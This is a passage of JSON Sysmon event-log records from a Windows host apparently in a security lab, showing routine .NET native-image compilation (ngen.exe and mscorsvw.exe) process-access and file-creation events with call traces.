\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.772","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-00101B9B0E00}","TargetProcessId":"4892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7693,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.772\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-00101B9B0E00}\r\nTargetProcessId: 4892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.772","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-00101B9B0E00}","TargetProcessId":"4892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7694,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.772\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-00101B9B0E00}\r\nTargetProcessId: 4892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.772","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-00101B9B0E00}","TargetProcessId":"4892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7695,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:04.257\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-226C-5F25-0000-0010529F0E00}\r\nTargetProcessId: 3180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:04.257","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-226C-5F25-0000-0010529F0E00}","TargetProcessId":"3180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7696,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:04.257\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-226C-5F25-0000-0010529F0E00}\r\nTargetProcessId: 3180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:04.257","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-226C-5F25-0000-0010529F0E00}","TargetProcessId":"3180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7697,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:04.257\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-226C-5F25-0000-0010529F0E00}\r\nTargetProcessId: 3180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:04.257","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-226C-5F25-0000-0010529F0E00}","TargetProcessId":"3180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7698,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:14.506\r\nProcessGuid: {41C8662E-226C-5F25-0000-0010529F0E00}\r\nProcessId: 3180\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c6c-0\\System.Data.Entity.dll\r\nCreationUtcTime: 2020-08-01 08:06:14.506","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:14.506","ProcessGuid":"{41C8662E-226C-5F25-0000-0010529F0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c6c-0\\System.Data.Entity.dll","CreationUtcTime":"2020-08-01 08:06:14.506","EventReceivedTime":"2020-08-01 08:06:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7699,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:14.756\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-0010A6920C00}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:14.756","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-0010A6920C00}","TargetProcessId":"4364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7700,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:14.756\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-0010A6920C00}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:14.756","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-0010A6920C00}","TargetProcessId":"4364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7701,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:14.756\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-0010A6920C00}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 